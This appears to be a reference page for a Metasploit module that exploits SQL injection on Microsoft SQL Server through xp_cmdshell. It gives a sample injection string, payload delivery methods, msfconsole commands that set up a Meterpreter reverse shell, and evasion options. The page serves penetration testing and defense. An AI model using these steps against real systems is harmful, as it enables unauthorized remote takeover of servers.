Microsoft SQL Server Payload Execution via SQL Injection
This module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens. For example, given the following injection: http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical you would need to set the following path: set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar In regard to the payload, unless there is a closed port in the web server, you dont want to use any "bind" payload, specially on port 80, as you will stop reaching the vulnerable web server host. You want a "reverse" payload, probably to your port 80 or to any other outbound port allowed on the firewall. For privileged ports execute Metasploit msfconsole as root. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoidied by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wcsript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.
Exploit Rank
- Excellent
Exploit Authors
- David Kennedy "ReL1K" < kennedyd013 [at] gmail.com >
- jduck < jduck [at] metasploit.com >
- Rodrigo Marcos < >
Vulnerability References
- CVE-2000-0402
- OSVDB-557
- BID-1281
- CVE-2000-1209
- OSVDB-15757
- BID-4797
- http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-...
Exploit Targets
- 0 - Automatic (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/mssql/lyris_listmanager_weak_pass
- exploit/windows/mssql/ms02_039_slammer
- exploit/windows/mssql/ms02_056_hello
- exploit/windows/mssql/ms09_004_sp_replwritetovarbin
- exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli
- exploit/windows/mssql/mssql_payload
Exploit Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/mssql/mssql_payload_sqli
msf exploit(mssql_payload_sqli) > show payloads
msf exploit(mssql_payload_sqli) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mssql_payload_sqli) > set LHOST [MY IP ADDRESS]
msf exploit(mssql_payload_sqli) > set RHOST [TARGET IP]
msf exploit(mssql_payload_sqli) > exploit
Exploit Module Options
| COOKIE | Cookie value (default: ) |
| DATA | POST data, if necessary, with [SQLi] indicating the injection (default: ) |
| DELIVERY | Payload delivery method (accepted: PS, CMD, OLD) (default: OLD) |
| GET_PATH | The complete path with [SQLi] indicating the injection (default: /) |
| METHOD | GET or POST (default: GET) |
| Proxies | Use a proxy chain |
| RHOST | The target address |
| RPORT | The target port (default: 80) |
| VHOST | HTTP server virtual host |
| BasicAuthPass | The HTTP password to specify for basic authentication |
| BasicAuthUser | The HTTP username to specify for basic authentication |
| ContextInformationFile | The information file that contains context information |
| DECODERSTUB | The VBS base64 file decoder stub to use. |
| DOMAIN | The domain to use for windows authentification |
| DigestAuthIIS | Conform to IIS, should work for most servers. Only set to false for non-IIS servers |
| DigestAuthPassword | The HTTP password to specify for digest authentication |
| DigestAuthUser | The HTTP username to specify for digest authentication |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| FingerprintCheck | Conduct a pre-exploit fingerprint verification |
| HEX2BINARY | The path to the hex2binary script on the disk |
| NTLM::SendLM | Always send the LANMAN response (except when NTLMv2_session is specified) |
| NTLM::SendNTLM | Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses |
| NTLM::SendSPN | Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required |
| NTLM::UseLMKey | Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent |
| NTLM::UseNTLM2_session | Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session |
| NTLM::UseNTLMv2 | Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| UserAgent | The User-Agent header to use for all requests |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::method_random_case | Use random casing for the HTTP method |
| HTTP::method_random_invalid | Use a random invalid, HTTP method for request |
| HTTP::method_random_valid | Use a random, but valid, HTTP method for request |
| HTTP::pad_fake_headers | Insert random, fake headers into the HTTP request |
| HTTP::pad_fake_headers_count | How many fake headers to insert into the HTTP request |
| HTTP::pad_get_params | Insert random, fake query string variables into the request |
| HTTP::pad_get_params_count | How many fake query string variables to insert into the request |
| HTTP::pad_method_uri_count | How many whitespace characters to use between the method and uri |
| HTTP::pad_method_uri_type | What type of whitespace to use between the method and uri (accepted: space, tab, apache) |
| HTTP::pad_post_params | Insert random, fake post variables into the request |
| HTTP::pad_post_params_count | How many fake post variables to insert into the request |
| HTTP::pad_uri_version_count | How many whitespace characters to use between the uri and version |
| HTTP::pad_uri_version_type | What type of whitespace to use between the uri and version (accepted: space, tab, apache) |
| HTTP::uri_dir_fake_relative | Insert fake relative directories into the uri |
| HTTP::uri_dir_self_reference | Insert self-referential directories into the uri |
| HTTP::uri_encode_mode | Enable URI encoding (accepted: none, hex-normal, hex-all, hex-random, u-normal, u-all, u-random) |
| HTTP::uri_fake_end | Add a fake end of URI (eg: /%20HTTP/1.0/../../) |
| HTTP::uri_fake_params_start | Add a fake start of params to the URI (eg: /%3fa=b/../) |
| HTTP::uri_full_url | Use the full URL for all HTTP requests |
| HTTP::uri_use_backslashes | Use back slashes instead of forward slashes in the uri |